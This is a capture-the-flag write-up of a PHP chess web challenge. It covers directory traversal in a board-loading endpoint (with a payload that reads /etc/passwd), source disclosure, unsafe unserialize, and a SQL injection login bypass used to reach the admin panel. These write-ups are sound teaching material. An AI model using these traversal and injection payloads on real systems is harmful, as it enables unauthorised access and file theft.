A web site with some cool matrix-looking chess. Let’s try to play a little.
I progressed well, even captured the queen and had the upper position. But then all the enemy peons turned into queens. What???
Lost :(
Let’s play around. Clicking START
doesn’t work. It does navigate me to index.php
which tells me it’s PHP.
cookie to reset the board.
Clicking on any piece sends a GET
to index.php
with the parameter move_start={cell}
, possibly so that the server correctly shows the available moves.
Moving a piece will then send another GET
parameter: move_end=YToyOntpOjA7czoyOiJkMiI7aToxO3M6MjoiZDQiO30=
. Interesting, it’s a base64, let’s decode it:
>> atob('YToyOntpOjA7czoyOiJkMiI7aToxO3M6MjoiZDQiO30=')
<- 'a:2:{i:0;s:2:"d2";i:1;s:2:"d4";}'
Seems like it tells the server that we moved from cell d2
to d4
. Let’s try to move a piece where we shouldn’t: pressing on the queen sends move_start=d1
, then we can send an encoding of 'a:2:{i:0;s:2:"d1";i:1;s:2:"c6";}'
and see where it gets us.
Sending a GET
with the parameter move_end=YToyOntpOjA7czoyOiJkMSI7aToxO3M6MjoiYzYiO30=
doesn’t work, it simply ignores the move altogether.
Okay, so the website seems to correctly implement chess against an AI that can also cheat. Let’s try other things.
There’s a Master Login
button. Redirects to admin.php
with a simple username-password form.
Original HTML doesn’t contain anything suspicious.
Back on the main page, there’s difficulty. 3 options and on choosing sends POST https://hackerchess-web.h4ck.ctfcompetition.com/index.php
with diff={num}
Tried sending with numbers outside of range (1-3), the board that is returned is the same starting one.
Viewing the HTML of the main page, I noticed this weird code that runs when START
is pressed:
function load_baseboard() {
const url = "load_board.php"
let xhr = new XMLHttpRequest()
const formData = new FormData();
formData.append('filename', 'baseboard.fen')
xhr.open('POST', url, true)
window.location.href = "index.php";
It sends a file name to the server at the load_board.php
Maybe we can make it so the server loads a board in a winning position for us? But it only receives a filename as input. Hmm…directory traversal maybe?
Let’s rerun the code so the browser sends the request without the redirection and we can see the response:
Loading Fen: rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1
Okay, this indeed seems like a setup for the board in some form, where each letter represents a piece (p = peon for instance), and 8
indicates an empty row. Capitals represents white. Unsure what the rest means (w KQkq - 0 1
), but we might be able to figure it out later.
Anyway, let’s try to traverse by passing ../../etc/passwd
in the file name (assuming we’re at the home directory of some user, going up twice should suffice).
Well, the server returns 500 Internal Server Error
, but the response includes interesting content
Loading Fen: root:x:0:0:root:/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
That’s indeed passwd
! Trying to aim for the best case scenario and access shadow
yield an empty response. Possibly we’re running as a low permission user.
I tried accessing some well-known files for some info leaks, like hostname
, hosts
, logs
directory, /var/www/...
in some known Apache2 locations (using the Server
header tells us the server runs Apache/2.4.41 (Ubunut)
) but no luck.
I also assumed for a second the file name is appended into a shell command (instead of file_read_contents
) and tried escaping, but any inclusion of special characters returns an empty error response.
But hey, if we can tell load_board.php
the path baseboard.fen
without additional detail, aren’t we also running in the user directory? Let’s try to read the .php
files themselves.
Requesting load_board.php
and we indeed can access it!
Loading Fen: <?php
$fen = "";
if (isset($_POST['filename'])) {
$fen = trim(file_get_contents($_POST['filename']));
# XXX: Debug remove this
echo 'Loading Fen: '. $fen;
else {
die("Invalid request!");
use PChess\Chess\Piece;
require 'vendor/autoload.php';
use PChess\Chess\Chess;
use PChess\Chess\Output\UnicodeOutput;
use PChess\Chess\Output\HtmlOutput;
use PChess\Chess\Board;
use PChess\Chess\Output\Link;
function init_chess(string $fen)
$chess = new Chess($fen);
return $chess;
$_SESSION['board'] = serialize(init_chess($fen));
Okay, so a board is initalized and saved in the session based on the contents of the file. A quick search for the imported files find this open source PHP chess client. On the docs, we see that indeed, the Chess
class can be passed an argument in FEN notation. The Wiki page also explains the remaining text that we didn’t understand:
`w` : White to start
`KQkq` : Allow all Castling possibiilities
`-` : No en passant allowed
0 : Halfmove clock counting the number of halfmoves for a specific chess rule.
1 : Fullmove number counting the number of moves.
Alright, cool. Let’s fetch admin.php
and index.php
/** index.php (shortened for brevity) */
if (isset($_GET['restart'])) {
header("Location: ". "/");
if (isset($_POST['diff'])) {
$diff = $_POST['diff'];
$diff = (int) $diff;
if ($diff >= 1 && $diff <= 3) {
$_SESSION['diff'] = $diff;
<div id="mainarea">
<div id="boardwrapper">
use PChess\Chess\Piece;
require 'vendor/autoload.php';
use PChess\Chess\Chess;
use PChess\Chess\Output\UnicodeOutput;
use PChess\Chess\Output\HtmlOutput;
use PChess\Chess\Board;
use PChess\Chess\Output\Link;
class Stockfish
public $cwd = "./";
public $binary = "/usr/games/stockfish";
public $other_options = array('bypass_shell' => 'true');
public $descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
private $process;
private $pipes;
private $thinking_time;
public function __construct()
$other_options = array('bypass_shell' => 'true');
//echo "Stockfish options" . $_SESSION['thinking_time'];
if (isset($_SESSION['thinking_time']) && is_numeric($_SESSION['thinking_time'])) {
$this->thinking_time = $_SESSION['thinking_time'];
echo '<!-- getting thinking time from admin.php -->';
echo '<!-- setting thinking time to ' . $this->thinking_time . '-->';
} else {
$this->thinking_time = 10;
$this->process = proc_open($this->binary, $this->descriptorspec, $this->pipes, $this->cwd, null, $this->other_options) ;
public function passUci()
if (is_resource($this->process)) {
fwrite($this->pipes[0], "uci\n");
fwrite($this->pipes[0], "ucinewgame\n");
fwrite($this->pipes[0], "isready\n");
public function passPosition(string $fen)
fwrite($this->pipes[0], "position fen $fen\n");
fwrite($this->pipes[0], "go movetime $this->thinking_time\n");
public function readOutput()
while (true) {
$s = fgets($this->pipes[1], 4096);
$str .= $s;
if (strpos(' '.$s, 'bestmove')) {
return $s;
public function __toString()
return fgets($this->pipes[1], 4096);
public function __wakeup()
$this->process = proc_open($this->binary, $this->descriptorspec, $this->pipes, $this->cwd, null, $this->other_options) ;
echo '<!--'.'wakeupcalled'.fgets($this->pipes[1], 4096).'-->';
function applyCheatsAI(Chess $chess)
$firstSquare = Board::SQUARES['a8'];
$lastSquare = Board::SQUARES['h1'];
for ($i = $firstSquare; $i <= $lastSquare; ++$i) {
if ($i & 0x88) {
$i += 7;
$piece = $chess->board[$i];
if ($piece == null) {
if ($piece->isPawn() && $piece->getColor() !== Piece::WHITE) {
$chess->board[$i] = new Piece(Piece::QUEEN, Piece::BLACK);
final class MyHtmlOutput extends HtmlOutput
* @return array<string, array<int, string>>
private static function getAllowedMoves(Chess $chess, ?string $from = null): array
$moves = $chess->moves($from ? Board::SQUARES[$from] : null);
$return = [];
foreach ($moves as $move) {
$return[$move->from][] = (string) $move->san;
return $return;
private static function isTurn(Chess $chess, Piece $piece): bool
return $piece->getColor() === $chess->turn;
* @param array<string, array> $allowedMoves Moves resulting from self::getAllowedMoves()
private static function canMove(string $from, int $to, array $allowedMoves): bool
$toSan = Board::algebraic($to);
if (!isset($allowedMoves[$from])) {
return false;
$cleanMoves = \array_map(static function (string $san) use ($from): string {
$check = \substr($san, -1);
$equalsPos = \strpos($san, '=');
if ('+' === $check || '#' === $check) {
$san = \substr($san, 0, -1);
} elseif ('O-O-O' === $san) {
$san = 'e1' === $from ? 'c1' : 'c8';
} elseif ('O-O' === $san) {
$san = 'e1' === $from ? 'g1' : 'g8';
} elseif (false !== $equalsPos) {
$san = \substr($san, 0, $equalsPos);
return \substr($san, -2);
}, $allowedMoves[$from]);
return \in_array($toSan, $cleanMoves, true);
public function generateLinks(Chess $chess, ?string $from = null, $identifier = null): array
$links = [];
$allowedMoves = self::getAllowedMoves($chess, $from);
/** @var int $i */
foreach ($chess->board as $i => $piece) {
$url = null;
$class = null;
$san = Board::algebraic($i);
if (null === $from) {
// move not started
if (null !== $piece && isset($allowedMoves[$san]) && self::isTurn($chess, $piece)) {
$url = $this->getStartUrl($san, $identifier);
} elseif ($from !== $san) {
// move started
if (self::canMove($from, $i, $allowedMoves)) {
if (null !== $movingPiece = $chess->board[Board::SQUARES[$from]]) {
if ('p' === $movingPiece->getType() && (0 === Board::rank($i) || 7 === Board::rank($i))) {
$url = $this->getPromotionUrl($from, $san, $identifier);
} else {
$url = $this->getEndUrl($from, $san, $identifier);
$class = 'target';
} else {
// restart move
$url = $this->getCancelUrl($identifier);
$class = 'current';
$links[$i] = new Link($class, $url);
return $links;
public function getStartUrl(string $from, $identifier = null): string
return '?move_start='.$from;
public function getEndUrl(string $from, string $to, $identifier = null): string
$data = base64_encode(serialize(array($from, $to)));
return '?move_end='.$data;
public function getCancelUrl($identifier = null): string
return '?cancel';
public function getPromotionUrl(string $from, string $to, $identifier = null): string
return '?promotion='.$from.'/'.$to;
function init_chess()
$chess = new Chess();
return $chess;
function list_moves_square(string $square, Chess $chess_state)
$moves = $chess_state->moves();
$valid_moves = array();
foreach ($moves as $move) {
#print ($move->from . " " . $square . "\n");
if ($move->from == $square) {
array_push($valid_moves, $move);
return $valid_moves;
if (isset($_SESSION['board']) && $_SESSION['board'] !== "") {
//echo "Board already set?\n";
//echo $_SESSION['board'];
$chess = unserialize($_SESSION['board']);
} else {
$chess = init_chess();
$output = new MyHtmlOutput();
if (isset($_GET['move_start'])) {
echo $output->render($chess, $_GET['move_start']);
} elseif (isset($_GET['move_end'])) {
$movei = unserialize(base64_decode($_GET['move_end']));
if ($chess->turn == "b") {
#XXX: this should never happen.
$chess = init_chess();
$_SESSION['board'] = serialize($chess);
die('Invalid Board state. Refresh the page');
echo "<!-- XXX : Debug remove this ".$movei. "-->";
$valid_moves = list_moves_square($movei[0], $chess);
$invalid_move = True;
foreach ($valid_moves as $move) {
if ($move->to == $movei[1]) {
$invalid_move = False;
if (!$invalid_move) {
$stockf = new Stockfish();
$move_s = $stockf->readOutput();
$move_s = explode(" ", $move_s);
$move_best = $move_s[1];
//echo $move_best;;
$bm_from = substr($move_best, 0, 2);
$bm_to = substr($move_best, 2, 2);
$chess->move(['from' => $bm_from, "to" => $bm_to]);
echo $output->render($chess);
if ($chess->inCheckmate()) {
if ($chess->turn != "b") {
echo '<h1>You lost! Game Over!</h1>';
} else {
echo "<h1>ZOMG How did you defeat my AI :(. You definitely cheated. Here's your flag: ". getenv('REDIRECT_FLAG') . "</h1>";
} else {
echo $output->render($chess);
$_SESSION["board"] = serialize($chess);
//echo $_SESSION['board'];
<div id="movehistory">
$entries = $chess->getHistory()->getEntries();
foreach ($entries as $entry) {
echo '<li>';
if ($entry->moveNumber == 7 && $_SESSION['cheats_enabled'] !== "0") {
$_SESSION["board"] = serialize($chess);
echo '<p id="moveno">'.$entry->moveNumber;
echo '<p id="frommove">'. ' _ ' . $entry->move->from.'</p>';
echo '<p id="tomove">'. ' _ ' .$entry->move->to.'</p>';
//var_dump( $entry);
echo "</li>";
/** admin.php (shortened for brevity) */
$db_name = "forge";
/** mysql database username */
$db_user = "forge";
/** mysql database password */
$db_password = getenv('REDIRECT_DB_PASSWORD');
/** mysql hostname */
$db_host = getenv('REDIRECT_DB_HOST');
$conn = new mysqli($db_host, $db_user, $db_password, $db_name);
<title>Secret Admin Panel</title>
if (isset($_SESSION['isadmin']) && $_SESSION['isadmin'] == true) {
<h1>Change config of the Chess AI!</h1>
<?php // echo $_SESSION['isadmin'];?>
<form method="POST">
Thinking Time: <input type="number" name="thinking_time" value="<?php echo $_SESSION['thinking_time']; ?>"><br/>
AI Queen Cheats: <input type="radio" id="cheats_enabled" name="cheats_enabled" value="1"> <label for="cheats_enabled">Yes</label> <input type="radio" id="cheats_enabled" name="cheats_enabled" value="0"> <label for="cheats_enabled">No</label><!-- Currently set to: <?php echo $_SESSION['cheats_enabled']; ?> -->
<input type="submit">
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
if ($_SESSION['isadmin'] == true && isset($_POST['thinking_time']) && isset($_POST['cheats_enabled'])) {
$_SESSION['thinking_time'] = $_POST['thinking_time'];
$_SESSION['cheats_enabled'] = $_POST['cheats_enabled'];
if (isset($_POST['username']) && isset($_POST['password'])) {
$query = sprintf("SELECT username FROM chess_ctf_admins WHERE username='%s' AND password='%s'", $_POST['username'], $_POST['password']);
try {
$result = $conn->query($query);
} catch (mysqli_sql_exception $e) {
$row = $result->fetch_assoc();
if (count($row) < 1) {
echo "Invalid Login!";
$_SESSION['isadmin'] = false;
} else {
echo "Logged in successfully!";
$_SESSION['isadmin'] = true;
$page = $_SERVER['REQUEST_URI'];
header("Location: ". $page);
if (!isset($_SESSION['isadmin']) || $_SESSION['isadmin'] != true) {
<form method="post">
username: <input type="text" name="username"><br>
password: <input type="password" name="password"><br>
<input type="submit">
That’s a lot of code. Let’s focus on what matters.
First, for some reason, when I queried index.php
, I got 200 OK instead of an error. Odd.
Second, I reviewed the index.php
code and wrote down some insights.
parameters handling
if (isset($_GET['restart'])) {
header("Location: ". "/");
if (isset($_POST['diff'])) {
$diff = $_POST['diff'];
$diff = (int) $diff;
if ($diff >= 1 && $diff <= 3) {
$_SESSION['diff'] = $diff;
Turns out there’s a restart GET
parameter that resets the session, and the difficulty is saved to the session and validated successfully.
- Stockfish wrapper
class Stockfish
// ...
public $binary = "/usr/games/stockfish";
// ...
public function __construct()
// ...
if (isset($_SESSION['thinking_time']) && is_numeric($_SESSION['thinking_time'])) {
$this->thinking_time = $_SESSION['thinking_time'];
echo '<!-- getting thinking time from admin.php -->';
echo '<!-- setting thinking time to ' . $this->thinking_time . '-->';
} else {
$this->thinking_time = 10;
$this->process = proc_open($this->binary, $this->descriptorspec, $this->pipes, $this->cwd, null, $this->other_options) ;
// ...
public function passPosition(string $fen)
fwrite($this->pipes[0], "position fen $fen\n");
fwrite($this->pipes[0], "go movetime $this->thinking_time\n");
// ...
It’s a small class wrapper around a Stockfish (open source Chess engine computing optimal moves) binary hosted at /usr/games/stockfish
. The wrapper spawns a process and interfaces simple input/output with the binary by sending the current board in FEN format and getting the optimal move back.
One immediately interesting point is that a thinking_time
session value that seems to be admin-controlled is passed to the binary. If I get control over it (maybe after getting admin access?), I can possibly alter the current board state for Stockfish and make it output suboptimal moves, though it depends on how the class parses Stockfish’s responses.
- Cheating!
function applyCheatsAI(Chess $chess)
// ...
for ($i = $firstSquare; $i <= $lastSquare; ++$i) {
if ($i & 0x88) {
$i += 7;
// ...
if ($piece->isPawn() && $piece->getColor() !== Piece::WHITE) {
$chess->board[$i] = new Piece(Piece::QUEEN, Piece::BLACK);
// ...
Well I didn’t imagine. When applied, this changes all black peons to queens. There this odd if
statement at the beginning that skips some cells.
However I don’t know how cells are represented as number, but this check verifies that the top bits in every nibble of the cell number are not both enabled. Anyway, I should remember this if the cheating mechanism needs to be bypassed later.
- HTML control
final class MyHtmlOutput extends HtmlOutput
// ...
Looks like they define an interface that can convert between the internal Chess objects (like PChess and Stockfish) and the data they need in the HTML, like the links on the board and the move list.
One interesting function I might be able to exploit later is canMove
that decides whether a given move (possibly like that way I input it earlier) is valid or not.
- Cheat no more
if ($entry->moveNumber == 7 && $_SESSION['cheats_enabled'] !== "0") {
$_SESSION["board"] = serialize($chess);
Alright, so cheats are enabled on move 7. I need to win beforehand or find how to manipulate the cheats_enabled
session flag.
- Game loop
// ...
} elseif (isset($_GET['move_end'])) {
$movei = unserialize(base64_decode($_GET['move_end']));
// ...
echo "<!-- XXX : Debug remove this ".$movei. "-->";
$valid_moves = list_moves_square($movei[0], $chess);
$invalid_move = True;
foreach ($valid_moves as $move) {
if ($move->to == $movei[1]) {
$invalid_move = False;
if (!$invalid_move) {
$stockf = new Stockfish();
// ...
$move_s = $stockf->readOutput();
// ...
$chess->move(['from' => $bm_from, "to" => $bm_to]);
// ...
if ($chess->inCheckmate()) {
if ($chess->turn != "b") {
echo '<h1>You lost! Game Over!</h1>';
} else {
echo "<h1>ZOMG How did you defeat my AI :(. You definitely cheated. Here's your flag: ". getenv('REDIRECT_FLAG') . "</h1>";
Alright, so the move_end
parameter is simply unserialized as a PHP object and decoding. Let’s use unserialize websites (like this) to see what the value converts to.
>> unserialize(a:2:{i:0;s:2:"d1";i:1;s:2:"c6";})
[0] => d1
[1] => c6
Alright, it’s simply my move from and move to, like I guessed. The valid moves are calculated using Pchess in list_moves_square
, so I don’t have much hopes of defeating it.
Also, finally, it seems that unsurprisingly, winning the game nets you the flag that is saved in an environment variable.
After writing down those insights, that only good lead I have is getting admin access to manipulate Stockfish.
Naturally, I analyzed admin.php
for some more insights about the code:
- Setting admin parameters
if (isset($_SESSION['isadmin']) && $_SESSION['isadmin'] == true) { <h1>Change config of the Chess AI!</h1> <form method="POST"> Thinking Time: <input type="number" name="thinking_time" value="<?php echo $_SESSION['thinking_time']; ?>"><br/> AI Queen Cheats: <input type="radio" id="cheats_enabled" name="cheats_enabled" value="1"> <label for="cheats_enabled">Yes</label> <input type="radio" id="cheats_enabled" name="cheats_enabled" value="0"> <label for="cheats_enabled">No</label><!-- Currently set to: <?php echo $_SESSION['cheats_enabled']; ?> --> <input type="submit"> </form> }
It seems lhat luckily both the cheats_enabled and the thinking_time parameters can be altered in the admin panel. Now just to get access to it.
- Logging as admin
if (isset($_POST['username']) && isset($_POST['password'])) { $query = sprintf("SELECT username FROM chess_ctf_admins WHERE username='%s' AND password='%s'", $_POST['username'], $_POST['password']); try { $result = $conn->query($query); } catch (mysqli_sql_exception $e) { echo($e); } $row = $result->fetch_assoc(); if (count($row) < 1) { echo "Invalid Login!"; $_SESSION['isadmin'] = false; } else { echo "Logged in successfully!"; $_SESSION['isadmin'] = true; $page = $_SERVER['REQUEST_URI']; header("Location: ". $page); } }
This screams llike SQL injection as the input username and password are passed straight into the SQL SELECT query without sanitation. Moreover, the check for admin when logging in simply verifies that more than one row is returned from the SELECT query.
So, setting up the username
parameter to 1' or '1'='1' --
and password
to anything will result in the query string to look like this:
SELECT username FROM chess_ctf_admins WHERE username='1' or '1'='1' --' AND password='anything'
clause will resolve to true
for every row, since '1'
is indeed equal to '1'
. The --
at the end makes sure that the remainder of the query is commented out and won’t bother us.
Let’s try:
username=1' OR '1'='1' --
The response is an 500 error. Hmm, maybe there’s something I’m missing. It could be an odd reason regarding using comments in a query.
There a few tricks to avoid using comments, in this scenario it’s easiest if I just input the password
parameter to be 1' or '1'='1
, and the username
to anything, the query string will still evaludate to true:
SELECT username FROM chess_ctf_admins WHERE username='anything' AND password='1' or '1'='1'
And…it works! Nice.
We can immediately disable cheating. As for the thinking time, I tried to set it to something other than an integer. Initially, I thought that to affect Stockfish’s input, I need to be able to input line feeds (\n
thinking_time=1 \n isready
I got 200 OK. But the thinking_time
input tag looks broken.
I refreshed and looked at the returned HTML
<form method="POST">
Thinking Time: <input type="number" name="thinking_time" value="1 \n isready"><br/>
AI Queen Cheats: <input type="radio" id="cheats_enabled" name="cheats_enabled" value="1"> <label for="cheats_enabled">Yes</label> <input type="radio" id="cheats_enabled" name="cheats_enabled" value="0"> <label for="cheats_enabled">No</label><!-- Currently set to: 0 -->
<input type="submit">
Looks like the edit worked.
Being a bit too quick to solve this, I went to Stockfish’s command documentation and checked what the existing commands do (uci
, ucinewgame
, isready
, position fen
and go movetime
Unsurprising, they initialize a new game when the Stockfish class is instantiated, and every move the game is sent as a FEN and Stockfish is given (by default), 10 ms to run.
I quickly scrolled through all possible commands, and searched for something that will net me a win. Very quickly I move that, beside movetime
, the go
commands take a lot more options. One of which is searchmoves
, which restricts the possible moves Stockfish looks at.
Great! I can just give it a single, silly move, and win via some quick mate.
I need to make 4 moves, so I quick wrote down commands to restrict Stockfish to use the moves shown in the Scholar’s mate Wikipage for the black player via the thinking_time
1 searchmoves e7e5
1 searchmoves b8c6
1 searchmoves g8f6
I checked it locally downloaded version of Stockfish, and it worked like a charm.
I set up thinking_time
to the first command via the admin panel and made a move.
…Stockfish played a totally different move to e7e5
. What went wrong?
I recalled that the PHP prints the value of thinking_time
within the Stockfish
class when it succesfully edits it. The function is called when the class is instanciated, which happen every time I finish a move (isset($_GET['move_end'])
is checked).
So I made another move to see the comment printed in the returned HTML and…nothing, no comment. I went back to the code and finally noticed the check I missed in my rush to break Stockfsih: if (isset($_SESSION['thinking_time']) && is_numeric($_SESSION['thinking_time']))
So my input must be a numeric value.
My mind jumped straight to overcoming the check by inputting something that bypasses is_numeric
, but a quick search verified the function is pretty airtight.
As a simple experiment, however, I decided to set up the thinking time to 1. Giving Stockfish such a small thinking window should make it easier to play against, right?
I set it up via the admin panel and started a game.
Made a normal King’s Pawn opening.
Stockfish moves the g8
knight to f6
- decent move.
I moved the queen diagonally to threat the queen’s peon.
Stockfish moved the a7
peon one step - okay, seems like the short thinking window has an impact, this is a silly move.
I moved the white bishop to protect the queen for the last step.
Stockmove moved the same peon another step forward - ha!
One last move of my queen and the game’s ended in a 4 move mate, and the challenge has given out its flag.